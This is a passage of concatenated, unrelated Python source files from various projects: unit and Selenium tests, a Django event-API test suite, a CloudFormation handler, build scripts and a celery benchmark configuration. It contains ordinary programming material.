client.delete_endpoint_config(EndpointConfigName=deployment_name) except ClientError as e: print('Endpoint did not exist, skipping') print(e.response['Error']) sendResponseCfn(event, context, "SUCCESS") except Exception as e: print(e) sendResponseCfn(event, context, "FAILED") def sendResponseCfn(event, context, responseStatus): response_body = {'Status': responseStatus, 'Reason': 'Log stream name: ' + context.log_stream_name, 'PhysicalResourceId': context.log_stream_name, 'StackId': event['StackId'], 'RequestId': event['RequestId'], 'LogicalResourceId': event['LogicalResourceId'], 'Data': json.loads("{}")} requests.put(event['ResponseURL'], data=json.dumps(response_body)) # Mapping between str and num class Solution: def multiply(self, num1, num2): numlookUp = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9} strlookUp = {0: '0', 1: '1', 2: '2', 3: '3', 4: '4', 5: '5', 6: '6', 7: '7', 8: '8', 9: '9'} if num1 == '0' or num2 == '0': return '0' num1 = num1[::-1] num2 = num2[::-1] tmpRes = [0 for i in range(len(num1) + len(num2))] for i in range(len(num1)): for j in range(len(num2)): tmpRes[i + j] += numlookUp[num1[i]] * numlookUp[num2[j]] res = [0 for i in range(len(num1) + len(num2))] for i in range(len(num1) + len(num2)): res[i] = tmpRes[i] % 10 if i < len(num1) + len(num2) - 1: tmpRes[i + 1] += tmpRes[i] // 10 return ''.join(strlookUp[i] for i in res[::-1]).lstrip('0') if __name__ == "__main__": s = Solution() num1 = '100' num2 = '100' print(s.multiply(num1, num2))fudgemsg/tests/test_maptaxonomyresolver.py # # Copyright CERN, 2010. # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # import unittest from fudgemsg.taxonomy.mapresolver import * from fudgemsg.taxonomy.map import Taxonomy class TestMapTaxomomy(unittest.TestCase): def test_no_resolver(self): tr = TaxonomyResolver() self.assertEquals(0, len(tr)) self.assertEquals(None, tr.resolve_taxonomy(1)) def test_simple_resolver(self): t1 = Taxonomy({1: u'foo', 2: u'bar'}) t2 = Taxonomy({3: u'foo', 4: u'bar'}) tr = TaxonomyResolver({1 : t1, 255: t2}) self.assertEquals(t1, tr.resolve_taxonomy(1)) self.assertEquals(t2, tr.resolve_taxonomy(255)) self.assertEquals(2, len(tr))tests/test_modify.py import time from selenium import webdriver from webdriver_manager.chrome import ChromeDriverManager from selenium.webdriver.chrome.options import Options from selenium.webdriver.common.by import By import random import string options = Options() options.headless = True driver = webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=options) # test modify function def test_modify(): url = "http://localhost:1667/#/" driver.get(url) time.sleep(2) '''prerequisites: - existing test user login - create new article to modify''' user_name = "testuser1" user_email = (user_name + "@example.") password = "$" driver.find_element(By.XPATH, '//a[@href="#/login"]').click() driver.find_element(By.XPATH, '//*[@type="text"]').send_keys(user_email) driver.find_element(By.XPATH, '//*[@type="password"]').send_keys(password) driver.find_element(By.TAG_NAME, "button").click() time.sleep(2) random_text = "".join([random.choice(string.ascii_lowercase) for _ in range(10)]) time.sleep(1) driver.find_element(By.XPATH, '//a[@href="#/editor"]').click() time.sleep(1) article_title = driver.find_element(By.XPATH, '//input[@placeholder="Article Title"]') article_title.send_keys(random_text) submit_btn = driver.find_element(By.XPATH, '//button[@type="submit"]') submit_btn.click() time.sleep(1) displayed_text = driver.find_element(By.XPATH, '//div[@class="container"]/h1').text assert displayed_text == random_text time.sleep(1) # modify article edit_btn = driver.find_element(By.XPATH, '//a[@class="btn btn-sm btn-outline-secondary"]') edit_btn.click() time.sleep(1) article_title = driver.find_element(By.XPATH, '//input[@placeholder="Article Title"]') article_title.clear() time.sleep(1) article_title.send_keys(random_text) submit_btn.click() time.sleep(1) # check modification displayed_text = driver.find_element(By.XPATH, '//div[@class="container"]/h1').text assert displayed_text == random_text # logout driver.find_element(By.XPATH, '//a[@active-class="active"]').click() driver.close() driver.quit() AutomatedTesting/Gem/PythonTests/largeworlds/gradient_signal/EditorScripts/ImageGradient_ProcessedImageAssignedSuccessfully.py1-10 """ Copyright (c) Contributors to the Open 3D Engine Project. For complete copyright and license terms please see the LICENSE at the root of this distribution. SPDX-License-Identifier: Apache-2.0 OR MIT """ import os import sys sys.path.append(os.path.dirname(os.path.abspath(__file__))) import azlmbr.asset as asset import azlmbr.bus as bus import azlmbr.entity as EntityId import azlmbr.editor as editor import azlmbr.math as math import azlmbr.paths sys.path.append(os.path.join(azlmbr.paths.devroot, 'AutomatedTesting', 'Gem', 'PythonTests')) import editor_python_test_tools.hydra_editor_utils as hydra from editor_python_test_tools.editor_test_helper import EditorTestHelper class TestImageGradient(EditorTestHelper): def __init__(self): EditorTestHelper.__init__(self, log_prefix="ImageGradient_ProcessedImageAssignedSucessfully", args=["level"]) def run_test(self): """ Summary: Level created with Entity having Image Gradient and Gradient Transform Modifier components. Save any new image to your workspace with the suffix "_gsi" and assign as image asset. Expected Behavior: Image can be assigned as the Image Asset for the Image as Gradient component. Test Steps: 1) Create level 2) Create an entity with Image Gradient and Gradient Transform Modifier components. 3) Assign the newly processed gradient image as Image asset. Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ # 1) Create level self.test_success = self.create_level( self.args["level"], heightmap_resolution=1024, heightmap_meters_per_pixel=1, terrain_texture_resolution=4096, use_terrain=False, ) # 2) Create an entity with Image Gradient and Gradient Transform Modifier components components_to_add = ["Image Gradient", "Gradient Transform Modifier", "Box Shape"] entity_position = math.Vector3(512.0, 512.0, 32.0) new_entity_id = editor.ToolsApplicationRequestBus( bus.Broadcast, "CreateNewEntityAtPosition", entity_position, EntityId.EntityId() ) if new_entity_id.IsValid(): print("Image Gradient Entity created") image_gradient_entity = hydra.Entity("Image Gradient Entity", new_entity_id) image_gradient_entity.components = [] for component in components_to_add: image_gradient_entity.add_component(component) # 3) Assign the processed gradient signal image as the Image Gradient's image asset and verify success # First, check for the base image in the workspace base_image = "image_grad_test_gsi.png" base_image_path = os.path.join("AutomatedTesting", "Assets", "ImageGradients", base_image) if os.path.isfile(base_image_path): print(f"{base_image} was found in the workspace") # Next, assign the processed image to the Image Gradient's Image Asset property processed_image_path = os.path.join("Assets", "ImageGradients", "image_grad_test_gsi.gradimage") asset_id = asset.AssetCatalogRequestBus(bus.Broadcast, "GetAssetIdByPath", processed_image_path, math.Uuid(), False) hydra.get_set_test(image_gradient_entity, 0, "Configuration|Image Asset", asset_id) # Finally, verify if the gradient image is assigned as the Image Asset success = hydra.get_component_property_value(image_gradient_entity.components[0], "Configuration|Image Asset") == asset_id self.test_success = self.test_success and success test = TestImageGradient() test.run() #!/usr/bin/env python from amusement.parks.disney.DisneyPark import DisneyPark class AnimalKingdom(DisneyPark): def __init__(self): super(AnimalKingdom, self).__init__() def getId(self): return '80007823' def getName(self): return "Disney's Animal Kingdom" from cffi import FFI ffibuilder = FFI() ffibuilder.set_source( "_fastx", r""" #include #include #include "kseq.h" KSEQ_INIT(gzFile, gzread) kseq_t *open_fastx (const char *fn) { gzFile fp = gzopen(fn, "r"); return kseq_init(fp); } void close_fastx(kseq_t *kseq) { gzclose(kseq->f->f); kseq_destroy(kseq); } """, libraries=['z'], include_dirs=['src'] ) ffibuilder.cdef( r""" typedef struct kstring_t { size_t l, m; char *s; } kstring_t; typedef struct kseq_t { kstring_t name, comment, seq, qual; ...; } kseq_t; kseq_t *open_fastx(const char *fn); void close_fastx(kseq_t *kseq); int kseq_read(kseq_t *kseq); """ ) ffibuilder.compile(verbose=True) augusto-herrmann/frictionless-py from frictionless import validate, checks # Duplicate Row def test_validate_duplicate_row(): report = validate("data/duplicate-rows.csv", checks=[checks.duplicate_row()]) assert report.flatten(["rowPosition", "fieldPosition", "code"]) == [ [4, None, "duplicate-row"], ] def test_validate_duplicate_row_valid(): report = validate("data/table.csv", checks=[{"code": "duplicate-row"}]) assert report.flatten(["rowPosition", "fieldPosition", "code"]) == [] # Deviated Value def test_validate_deviated_value(): source = [["temperature"], [1], [-2], [7], [0], [1], [2], [5], [-4], [100], [8], [3]] report = validate( source, checks=[ checks.deviated_value( field_name="temperature", average="median", interval=3, ) ], ) assert report.flatten(["code", "note"]) == [ [ "deviated-value", 'value "100" in row at position "10" and field "temperature" is deviated "[-87.21, 91.21]"', ], ] def test_value_deviated_value_not_enough_data(): source = [ ["temperature"], [1], ] report = validate( source, checks=[{"code": "deviated-value", "fieldName": "temperature"}], ) assert report.flatten(["code", "note"]) == [] def test_validate_deviated_value_not_a_number(): source = [ ["row", "name"], [2, "Alex"], ] report = validate(source, checks=[{"code": "deviated-value", "fieldName": "name"}]) assert report.flatten(["code", "note"]) == [ ["check-error", 'deviated value check requires field "name" to be numiric'], ] def test_validate_deviated_value_non_existent_field(): source = [ ["row", "name"], [2, "Alex"], ] report = validate( source, checks=[{"code": "deviated-value", "fieldName": "bad"}], ) assert report.flatten(["code", "note"]) == [ ["check-error", 'deviated value check requires field "bad" to exist'], ] def test_validate_deviated_value_incorrect_average(): source = [ ["row", "name"], [2, "Alex"], ] report = validate( source, checks=[{"code": "deviated-value", "fieldName": "row", "average": "bad"}], ) assert report.flatten(["code", "note"]) == [ [ "check-error", 'deviated value check supports only average functions "mean, median, mode"', ], ] # Truncated value def test_validate_truncated_values(): source = [ ["int", "str"], ["a" * 255, 32767], ["good", 2147483647], ] report = validate(source, checks=[checks.truncated_value()]) assert report.flatten(["rowPosition", "fieldPosition", "code"]) == [ [2, 1, "truncated-value"], [2, 2, "truncated-value"], [3, 2, "truncated-value"], ] def test_validate_truncated_values_close_to_errors(): source = [ ["int", "str"], ["a" * 254, 32766], ["good", 2147483646], ] report = validate(source, checks=[{"code": "truncated-value"}]) assert report.flatten(["rowPosition", "fieldPosition", "code"]) == [] thinkmoore/das # This software was developed at the National Institute of Standards # and Technology in whole or in part by employees of the Federal # Government in the course of their official duties. Pursuant to # title 17 Section 105 of the United States Code portions of this # software authored by NIST employees are not subject to copyright # protection and are in the public domain. For portions not authored # by NIST employees, NIST has been granted unlimited rights. NIST # assumes no responsibility whatsoever for its use by other parties, # and makes no guarantees, expressed or implied, about its quality, # reliability, or any other characteristic. # # We would appreciate acknowledgement if the software is used. __version__="0.1.0" import sys import logging import os sys.path.append( os.path.join(os.path.dirname(__file__), "../..")) import dfxml import dfxml.objects as Objects def test_all(): logging.basicConfig(level=logging.DEBUG) _logger = logging.getLogger(os.path.basename(__file__)) v0 = Objects.VolumeObject() v0.sector_size = 512 v0.block_size = 4096 v0.partition_offset = 32256 v0.ftype = -1 assert v0.ftype == -1 v0.ftype_str = 1 v0.block_count = 100000 v0.allocated_only = False v0.first_block = 0 v0.last_block = v0.block_count _logger.debug(repr(v0)) v1 = eval("Objects." + repr(v0)) e0 = v0.to_Element() _logger.debug("e0 = %r" % e0) v2 = Objects.VolumeObject() v2.populate_from_Element(e0) v1.block_size = 512 v2.partition_offset = v0.partition_offset + v0.block_count*v0.block_size d01 = v0.compare_to_other(v1) d02 = v0.compare_to_other(v2) _logger.debug("d01 = %r" % d01) assert d01 == set(["block_size"]) _logger.debug("d02 = %r" % d02) assert d02 == set(["partition_offset"]) import AnimatedProp from direct.actor import Actor from direct.interval.IntervalGlobal import * class HQPeriscopeAnimatedProp(AnimatedProp.AnimatedProp): def __init__(self, node): AnimatedProp.AnimatedProp.__init__(self, node) parent = node.getParent() self.periscope = Actor.Actor(node, copy=0) self.periscope.reparentTo(parent) self.periscope.loadAnims({'anim': 'phase_3.5/models/props/HQ_periscope-chan'}) self.periscope.pose('anim', 0) self.node = self.periscope self.track = Sequence(Wait(2.0), self.periscope.actorInterval('anim', startFrame=0, endFrame=40), Wait(0.7), self.periscope.actorInterval('anim', startFrame=40, endFrame=90), Wait(0.7), self.periscope.actorInterval('anim', startFrame=91, endFrame=121), Wait(0.7), self.periscope.actorInterval('anim', startFrame=121, endFrame=91), Wait(0.7), self.periscope.actorInterval('anim', startFrame=90, endFrame=40), Wait(0.7), self.periscope.actorInterval('anim', startFrame=40, endFrame=90), Wait(0.7), self.periscope.actorInterval('anim', startFrame=91, endFrame=121), Wait(0.5), self.periscope.actorInterval('anim', startFrame=121, endFrame=148), Wait(3.0), name=self.uniqueName('HQPeriscope')) def delete(self): AnimatedProp.AnimatedProp.delete(self) self.node.cleanup() del self.node del self.periscope del self.track def enter(self): AnimatedProp.AnimatedProp.enter(self) self.track.loop() def exit(self): AnimatedProp.AnimatedProp.exit(self) self.track.finish() apps/phonebook/tests/test_modelform.py from funfactory.urlresolvers import reverse from nose.tools import eq_ from pyquery import PyQuery as pq from apps.common.tests import ESTestCase, user class ModelForms(ESTestCase): def test_edit_unavailable_form_field(self): newbie_client = self.pending_client newbie = self.pending # make sure we're at a good starting state assert not newbie.get_profile().is_vouched edit_profile_url = reverse('profile.edit') bad_data = dict(full_name='BadLaRue', bio='Rides the rails', is_vouched=True) bad_edit = newbie_client.post(edit_profile_url, bad_data, follow=True) eq_(bad_edit.status_code, 200) newbie_profile = bad_edit.context['profile'] assert not newbie_profile.is_vouched eq_(newbie_profile.full_name, bad_data['full_name']) def test_username_filled_in(self): """The username field should have a type and value.""" newbie = user(username='sam', email='') url = reverse('profile.edit') assert self.client.login(email=newbie.email) response = self.client.get(url, follow=True) eq_(200, response.status_code) doc = pq(response.content) field = doc('#id_username')[0] eq_('input', field.tag) assert 'value' in field.attrib eq_('text', field.attrib['type']) eq_(newbie.username, field.attrib['value']) import unittest from sql4json.sql_statement import SQLStatement from sql4json.exceptions import SQLStatementFormatException class SQLStatementTests(unittest.TestCase): def test_parse_empty_statement(self): try: sql_statement = SQLStatement('') self.fail() except SQLStatementFormatException: pass def test_select(self): sql_statement = SQLStatement("select *") self.assertEqual("*", sql_statement.get_select_section()) self.assertEqual(None, sql_statement.get_from_section()) self.assertEqual(None, sql_statement.get_where_section()) self.assertEqual(None, sql_statement.get_limit_section()) def test_select_from(self): sql_statement = SQLStatement("select * from some/path") self.assertEqual("*", sql_statement.get_select_section()) self.assertEqual("some/path", sql_statement.get_from_section()) self.assertEqual(None, sql_statement.get_where_section()) self.assertEqual(None, sql_statement.get_limit_section()) def test_from_where(self): sql_statement = SQLStatement("SELECT id, key3 FROM somewhere WHERE key1==1 or (key2 == 'string value'&&key3>4") self.assertEqual("id, key3", sql_statement.get_select_section()) self.assertEqual("somewhere", sql_statement.get_from_section()) self.assertEqual("key1==1 or (key2 == 'string value'&&key3>4", sql_statement.get_where_section()) self.assertEqual(None, sql_statement.get_limit_section()) def test_from_where_limit(self): sql_statement = SQLStatement( "SELECT id, key3 FROM somewhere WHERE key1==1 or (key2 == 'string value'&&key3>4 LIMIT 5") self.assertEqual("id, key3", sql_statement.get_select_section()) self.assertEqual("somewhere", sql_statement.get_from_section()) self.assertEqual("key1==1 or (key2 == 'string value'&&key3>4", sql_statement.get_where_section()) self.assertEqual("5", sql_statement.get_limit_section()) def test_sql_statements_not_starting_with_a_section_name_throw_an_exception(self): try: sql_statement = SQLStatement("WORST sql statement.... EVER.") self.fail() except SQLStatementFormatException: passtests/commands/test_latest.py def test_latest(): print('\n >>> start Latest Features... \n') import talos from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense x, y = talos.templates.datasets.iris() p = {'activation': ['relu', 'elu'], 'optimizer': ['Nadam', 'Adam'], 'losses': ['logcosh'], 'shapes': ['brick'], 'first_neuron': [16, 32, 64, 128], 'hidden_layers': [0, 1, 2, 3], 'dropout': [.2, .3, .4], 'batch_size': [20, 30, 40, 50], 'epochs': [10]} def iris_model(x_train, y_train, x_val, y_val, params): model = Sequential() model.add(Dense(params['first_neuron'], input_dim=4, activation=params['activation'])) talos.utils.hidden_layers(model, params, 3) model.add(Dense(3, activation='softmax')) model.compile(optimizer=params['optimizer'], loss=params['losses'], metrics=['acc']) out = model.fit(x_train, y_train, callbacks=[talos.utils.ExperimentLogCallback('test_latest', params)], batch_size=params['batch_size'], epochs=params['epochs'], validation_data=(x_val, y_val), verbose=0) return out, model scan_object = talos.Scan(x, y, model=iris_model, params=p, experiment_name='test_latest', round_limit=5, reduction_method='gamify', save_weights=False) print('finised Latest Features \n') from setuptools import setup, find_packages def get_version_and_cmdclass(package_path): """Load version.py module without importing the whole package. Template code from miniver """ import os from importlib.util import module_from_spec, spec_from_file_location spec = spec_from_file_location( "version", os.path.join(package_path, "_clean_version.py") ) module = module_from_spec(spec) spec.loader.exec_module(module) return module.__version__, module.cmdclass version, cmdclass = get_version_and_cmdclass("e2elink") with open("README.md", "r", encoding="utf8") as fh: long_description = fh.read() with open("requirements.txt") as f: install_requires = f.read().splitlines() with open("requirements_extra.txt") as f: install_requires_extra = f.read().splitlines() extras_require = {"dev": install_requires_extra} setup( name="e2elink", version=version, cmdclass=cmdclass, author=", ", author_email=", ", url="https://github.com/ersilia-os/e2elink", description="End-to-end record linkage aided by machine learning", long_description=long_description, long_description_content_type="text/markdown", license="MIT", python_requires=">=3.7", install_requires=install_requires, extras_require=extras_require, packages=find_packages(exclude=("utilities")), entry_points={"console_scripts": ["e2elink=e2elink.cli:cli"]}, classifiers=( "Programming Language :: Python :: 3.7", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", "Topic :: Scientific/Engineering :: Artificial Intelligence", ), keywords="record-linkage machine-learning medical-informatics", project_urls={ "Source Code": "https://github.com/ersilia-os/e2elink/", }, include_package_data=True, package_data={"": ["example/files/*.csv"]}, ) #!/usr/bin/env python3 n = int(input()) for a in range(1, 40): for b in range(1, 30): if 3 ** a + 5 ** b == n: print(a, b) exit() print(-1)from gan_training.models import ( resnet, resnet2, resnet3, dvae ) dvae_dict = { 'BetaVAE_H': dvae.BetaVAE_H, } generator_dict = { 'resnet': resnet.Generator, 'resnet2': resnet2.Generator, 'resnet3': resnet3.Generator, 'dvae_dec': dvae.Generator, } discriminator_dict = { 'resnet': resnet.Discriminator, 'resnet2': resnet2.Discriminator, 'resnet3': resnet3.Discriminator, 'dvae_enc': dvae.Discriminator, } from typing import Tuple import pandas as pd from sklearn.model_selection import train_test_split from src.utils.read_params import read_params def custom_train_test_split(file_path: str, test_size: float, split_seed: int) -> Tuple[pd.DataFrame, pd.DataFrame]: """Splitting data into train and test sets. Parameters ---------- file_path : str Dataset path. test_size : float Proportion of the dataset to include in the train split. split_seed : int Seed for reproducible splitting. Returns ------- train : pd.DataFrame Train set. test : pd.DataFrame Test set. """ df = pd.read_csv(file_path) train, test = train_test_split(df, test_size=test_size, random_state=split_seed) return train, test if __name__ == '__main__': params = read_params() train_df, test_df = custom_train_test_split( params['file_path'], params['test_size'], params['split_seed'] ) train_df.to_csv("data/processed/train.csv", index=False) test_df.to_csv("data/processed/test.csv", index=False) events/tests/test_event_post.py # -*- coding: utf-8 -*- from datetime import timedelta import pytest from django.utils import timezone, translation from django.utils.encoding import force_text from .utils import versioned_reverse as reverse from events.tests.utils import assert_event_data_is_equal from .conftest import DATETIME from events.models import Event from django.conf import settings @pytest.fixture def list_url(): return reverse('event-list') # === util methods === def create_with_post(api_client, event_data, data_source=None): create_url = reverse('event-list') if data_source: api_client.credentials(apikey=data_source.api_key) # save with post response = api_client.post(create_url, event_data, format='json') assert response.status_code == 201, str(response.content) # double-check with get resp2 = api_client.get(response.data['@id']) assert resp2.status_code == 200, str(response.content) return resp2 # === tests === @pytest.mark.django_db def test__create_a_minimal_event_with_post(api_client, minimal_event_dict, user): api_client.force_authenticate(user=user) response = create_with_post(api_client, minimal_event_dict) assert_event_data_is_equal(minimal_event_dict, response.data) @pytest.mark.django_db def test__cannot_create_an_event_with_existing_id(api_client, minimal_event_dict, user): api_client.force_authenticate(user=user) minimal_event_dict['id'] = settings.SYSTEM_DATA_SOURCE_ID + ':1' response = create_with_post(api_client, minimal_event_dict) response2 = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response2.status_code == 400 @pytest.mark.django_db def test__a_non_user_cannot_create_an_event(api_client, minimal_event_dict): response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response.status_code == 401 @pytest.mark.django_db def test__a_non_admin_cannot_create_an_event(api_client, minimal_event_dict, user): user.get_default_organization().admin_users.remove(user) api_client.force_authenticate(user) response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response.status_code == 403 @pytest.mark.django_db def test__api_key_with_organization_can_create_an_event(api_client, minimal_event_dict, data_source, organization): data_source.owner = organization data_source.save() response = create_with_post(api_client, minimal_event_dict, data_source) assert_event_data_is_equal(minimal_event_dict, response.data) @pytest.mark.django_db def test__api_key_without_organization_cannot_create_an_event(api_client, minimal_event_dict, data_source): api_client.credentials(apikey=data_source.api_key) response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response.status_code == 403 @pytest.mark.django_db def test__unknown_api_key_cannot_create_an_event(api_client, minimal_event_dict): api_client.credentials(apikey='unknown') response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response.status_code == 401 @pytest.mark.django_db def test__empty_api_key_cannot_create_an_event(api_client, minimal_event_dict): api_client.credentials(apikey='') response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response.status_code == 401 @pytest.mark.django_db def test__cannot_create_an_event_ending_before_start_time(list_url, api_client, minimal_event_dict, user): api_client.force_authenticate(user=user) minimal_event_dict['end_time'] = (timezone.now() + timedelta(days=1)).isoformat() minimal_event_dict['start_time'] = (timezone.now() + timedelta(days=2)).isoformat() response = api_client.post(list_url, minimal_event_dict, format='json') assert response.status_code == 400 assert 'end_time' in response.data @pytest.mark.django_db def test__create_a_draft_event_without_location_and_keyword(list_url, api_client, minimal_event_dict, user): api_client.force_authenticate(user=user) minimal_event_dict.pop('location') minimal_event_dict.pop('keywords') minimal_event_dict['publication_status'] = 'draft' response = create_with_post(api_client, minimal_event_dict) assert_event_data_is_equal(minimal_event_dict, response.data) # the drafts should not be visible to unauthorized users api_client.logout() resp2 = api_client.get(response.data['@id']) assert '@id' not in resp2.data @pytest.mark.django_db def test__cannot_create_a_draft_event_without_a_name(list_url, api_client, minimal_event_dict, user): api_client.force_authenticate(user=user) minimal_event_dict.pop('name') minimal_event_dict['publication_status'] = 'draft' response = api_client.post(list_url, minimal_event_dict, format='json') assert response.status_code == 400 assert 'name' in response.data @pytest.mark.django_db def test__cannot_publish_an_event_without_location(list_url, api_client, minimal_event_dict, user): api_client.force_authenticate(user=user) minimal_event_dict.pop('location') response = api_client.post(list_url, minimal_event_dict, format='json') assert response.status_code == 400 assert 'location' in response.data @pytest.mark.django_db def test__cannot_publish_an_event_without_keywords(list_url, api_client, minimal_event_dict, user): api_client.force_authenticate(user=user) minimal_event_dict.pop('keywords') response = api_client.post(list_url, minimal_event_dict, format='json') assert response.status_code == 400 assert 'keywords' in response.data @pytest.mark.django_db def test__create_a_complex_event_with_post(api_client, complex_event_dict, user): api_client.force_authenticate(user=user) response = create_with_post(api_client, complex_event_dict) assert_event_data_is_equal(complex_event_dict, response.data) @pytest.mark.django_db def test__autopopulated_fields_at_create( api_client, minimal_event_dict, user, user2, other_data_source, organization, organization2): # create an event api_client.force_authenticate(user=user) response = create_with_post(api_client, minimal_event_dict) event = Event.objects.get(id=response.data['id']) assert event.created_by == user assert event.last_modified_by == user assert event.created_time is not None assert event.last_modified_time is not None assert event.data_source.id == settings.SYSTEM_DATA_SOURCE_ID assert event.publisher == organization # the following values may not be posted @pytest.mark.django_db @pytest.mark.parametrize("non_permitted_input,non_permitted_response", [ ({'id': 'not_allowed:1'}, 400), # may not fake id ({'data_source': 'theotherdatasourceid'}, 400), # may not fake data source ({'publisher': 'test_organization2'}, 400), # may not fake organization ]) def test__non_editable_fields_at_create(api_client, minimal_event_dict, list_url, user, non_permitted_input, non_permitted_response): api_client.force_authenticate(user) minimal_event_dict.update(non_permitted_input) response = api_client.post(list_url, minimal_event_dict, format='json') assert response.status_code == non_permitted_response if non_permitted_response >= 400: # check that there is an error message for the corresponding field assert list(non_permitted_input)[0] in response.data # location field is used for JSONLDRelatedField tests @pytest.mark.django_db @pytest.mark.parametrize("ld_input,ld_expected", [ ({'location': {'@id': '/v1/place/test%20location/'}}, 201), ({'location': {'@id': ''}}, 400), # field required ({'location': {'foo': 'bar'}}, 400), # incorrect json ({'location': '/v1/place/test%20location/'}, 400), # incorrect json ({'location': 7}, 400), # incorrect json ({'location': None}, 400), # cannot be null ({}, 400), # field required ]) def test__jsonld_related_field(api_client, minimal_event_dict, list_url, place, user, ld_input, ld_expected): api_client.force_authenticate(user) del minimal_event_dict['location'] minimal_event_dict.update(ld_input) response = api_client.post(list_url, minimal_event_dict, format='json') assert response.status_code == ld_expected if ld_expected >= 400: # check that there is a error message for location field assert 'location' in response.data @pytest.mark.django_db def test_start_time_and_end_time_validation(api_client, minimal_event_dict, user): api_client.force_authenticate(user) minimal_event_dict['start_time'] = timezone.now() - timedelta(days=2) minimal_event_dict['end_time'] = timezone.now() - timedelta(days=1) with translation.override('en'): response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response.status_code == 400 assert 'Start time cannot be in the past.' in response.data['start_time'] assert 'End time cannot be in the past.' in response.data['end_time'] @pytest.mark.django_db def test_description_and_short_description_required_in_name_languages(api_client, minimal_event_dict, user): api_client.force_authenticate(user) minimal_event_dict['name'] = {'fi': 'nimi', 'sv': 'namn'} minimal_event_dict['short_description'] = {'fi': 'lyhyt kuvaus'} minimal_event_dict['description'] = {'sv': 'description in swedish'} with translation.override('en'): response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') # there should be only one error assert len(response.data['short_description']) == 1 assert len(response.data['description']) == 1 assert (force_text(response.data['short_description']['sv']) == 'This field must be specified before an event is published.') assert (force_text(response.data['description']['fi']) == 'This field must be specified before an event is published.') @pytest.mark.django_db def test_short_description_cannot_exceed_160_chars(api_client, minimal_event_dict, user): api_client.force_authenticate(user) minimal_event_dict['short_description']['fi'] = 'x' * 161 with translation.override('en'): response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response.status_code == 400 assert (force_text(response.data['short_description']['fi'] == 'Short description length must be 160 characters or less')) @pytest.mark.django_db @pytest.mark.parametrize("offers, expected", [ ([{'is_free': True}], 201), ([{'is_free': False, 'price': {'fi': 4}}], 201), ([{'description': 'foo'}, {'is_free': True}], 201), ([{'is_free': False}], 400) ]) def test_price_info_required(api_client, minimal_event_dict, user, offers, expected): api_client.force_authenticate(user) minimal_event_dict['offers'] = offers with translation.override('en'): response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response.status_code == expected if expected == 400: assert force_text(response.data['offers'][0]) == 'Price info must be specified before an event is published.' @pytest.mark.parametrize('name, is_valid', [ ({'sv': 'namn'}, True), ({'foo': 'bar'}, False), ({}, False), (None, False), ]) @pytest.mark.django_db def test_name_required_in_some_language(api_client, minimal_event_dict, user, name, is_valid): api_client.force_authenticate(user) minimal_event_dict['name'] = name with translation.override('en'): response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') if is_valid: assert response.status_code == 201 else: assert response.status_code == 400 if not is_valid: assert force_text(response.data['name'][0]) == 'The name must be specified.' """ 主要用用来测试相同基准下的celery和此框架的性能对比。 """ import time import celery from celery import platforms from function_scheduling_distributed_framework import frame_config from test_frame.my_patch_frame_config import do_patch_frame_config do_patch_frame_config() platforms.C_FORCE_ROOT = True # celery_app = celery.Celery('test_frame.test_celery.test_celery_app') celery_app = celery.Celery() class Config2: broker_url = f'redis://:{frame_config.REDIS_PASSWORD}@{frame_config.REDIS_HOST}:{frame_config.REDIS_PORT}/10' # 使用redis result_backend = f'redis://:{frame_config.REDIS_PASSWORD}@{frame_config.REDIS_HOST}:{frame_config.REDIS_PORT}/14' # 使用redis broker_connection_max_retries = 150 # 默认是100 # result_serializer = 'json' task_default_queue = 'default' # 默认celery # task_default_rate_limit = '101/s' task_default_routing_key = 'default' # task_eager_propagates = False # 默认disable task_ignore_result = False # task_serializer = 'json' # task_time_limit = 70 # task_soft_time_limit = 60 # worker_concurrency = 32 # worker_enable_remote_control = True # worker_prefetch_multiplier = 3 # 默认4 # worker_redirect_stdouts_level = 'WARNING' # worker_timer_precision = 0.1 # 默认1秒 task_routes = { '求和啊': {"queue": "queue_add2", }, 'sub啊': {"queue": 'queue_sub2'}, 'f1': {"queue": 'queue_f1'}, } # task_reject_on_worker_lost = True #配置这两项可以随意停止 # task_acks_late = True celery_app.config_from_object(Config2) @celery_app.task(name='求和啊', ) # REMIND rate_limit在这里写,也可以在调用时候写test_task.apply_async(args=(1,2),expires=3) def add(a, b): print(f'消费此消息 {a} + {b} 中。。。。。') time.sleep(100, ) # 模拟做某事需要阻塞10秒种,必须用并发绕过此阻塞。 print(f'计算 {a} + {b} 得到的结果是 {a + b}') return a + b @celery_app.task(name='sub啊') def sub(x, y): print(f'消费此消息 {x} - {y} 中。。。。。') time.sleep(100, ) # 模拟做某事需要阻塞10秒种,必须用并发绕过此阻塞。 print(f'计算 {x} - {y} 得到的结果是 {x - y}') return x - y print(sub) if __name__ == '__main__': """ Pool implementation: prefork (default), eventlet, gevent or solo. """ """ celery_app.worker_main( argv=['worker', '--pool=prefork', '--concurrency=100', '-n', 'worker1@%h', '--loglevel=debug', '--queues=queue_add', '--detach','--logfile=/pythonlogs/celery_add.log']) """ # queue_add,queue_sub,queue_f1 celery_app.worker_main( argv=['worker', '--pool=gevent', '--concurrency=5', '-n', 'worker1@%h', '--loglevel=debug', 